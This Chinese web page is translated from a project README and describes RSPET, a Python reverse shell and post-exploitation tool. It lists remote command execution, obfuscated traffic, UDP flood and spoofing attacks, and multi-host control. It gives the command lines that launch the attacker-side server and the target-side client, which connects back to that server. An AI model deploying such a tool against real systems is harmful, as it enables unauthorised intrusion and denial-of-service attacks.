安云网 - AnYun.ORG | 专注于网络信息收集、网络数据分享、网络安全研究、网络各种猎奇八卦。
当前位置: 安云网 > 技术关注 > 神兵利刃 > 基于Python的反连Shell和后渗透工具|

基于Python的反连Shell和后渗透工具|

时间:2016-08-28来源: 作者:felix点击:
声明:该软件供学习研究使用或作为一个POC。开发者不赞同和鼓励或以其它方式支持非授权的电脑入侵和网络破坏。RSPET (Reverse Shell and Post Exploitation Tool) 是一个基于Python的反连shell,并且具备后渗透阶…

声明:该软件供学习研究使用或作为一个POC。开发者不赞同和鼓励或以其它方式支持非授权的电脑入侵和网络破坏。 //本文来自安云网

RSPET (Reverse Shell and Post Exploitation Tool) 是一个基于Python的反连shell,并且具备后渗透阶段的一些功能。

//安云网咨询系统

注意:在V0.0.3版本中添加了一个min文件夹,因为这个新版本包含了其它不影响主功能(反连shell)的其它功能,min不会引入v0.0.3之后版本的任何更多功能,只接受与bug和性能相关的补丁。

//本文来自安云网

目前的版本:v0.0.6

//copyright AnYun.ORG

功能

远程命令执行 //copyright AnYun.ORG

流量加密(异或加密代替明文传输),使用443端口可以取得更好的效果【1】 //本文来自安云网

内置了加密传输文件或二进制数据的功能

//内容来自AnYun.ORG

内置UDP洪泛攻击工具

//安云网,anyun.org

内置UDP欺骗攻击工具【2】

//本文来自安云网

管理多个或全部主机,控制多个连接的主机传输文件和UDP洪泛攻击。 //内容来自安云网

模块化的代码设计,易于定制【3】

//ANYUN.ORG

客户端脚本已经过测试,可以兼容Pyinstaller(可以转换成.exe)【4】

//copyright AnYun.ORG

【1】异或加密和客户端架构的灵感来源于primalsecurity.net,如果你喜欢这个工具,你可能也喜欢他们做的其它东西。

//安云网咨询系统

【2】UDP欺骗使用了RAW_SOCKETS,所以为了正常使用,客户端需要运行在支持RAW_SOCKETS的操作系统(大部分基于Unix的系统)上,并且有root权限。最后,许多ISP在某地方做了手脚,有可能会丢弃或者修改欺骗的数据包。 //安云网咨询系统

【3】查看EXPANDING,方便你添加新的功能,或者根据你的需要定制RSPET //安云网咨询系统

【4】查看primalsecurity.net的博客,了解生成.exe的方法 //copyright AnYun.ORG

部署

RSPET_server.py或RSPET_server_min.py运行在攻击机上,接收连接。 //ANYUN.ORG

RSPET_client.py或RSPET_client_min.py运行在目标机上,会初始化并发送连接请求,等待输入。 //安云网,anyun.org

执行

服务端:

//安云网咨询系统

python RSPET_server.py (max_connections)  
//本文来自安云网

max_connections如果为空,则默认为5. //安云网咨询系统

控制端:

//本文来自安云网

python RSPET_client.py server_ip 
//安云网咨询系统

可以根据个人需要进行调整

//内容来自安云网

Linux发行版

包含RSPET的Linux发行版列表 //内容来自AnYun.ORG

BlackArch Linux (2016.04.28版本中)

//ANYUN.ORG

//ANYUN.ORG

//安云网咨询系统

//本文来自安云网

//内容来自安云网

*本文翻译自:https://github.com/panagiks/RSPET,译者felix,转载须注明来自FreeBuf黑客与极客(FreeBuf.COM)

顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
验证码: 点击我更换图片
相关内容
推荐内容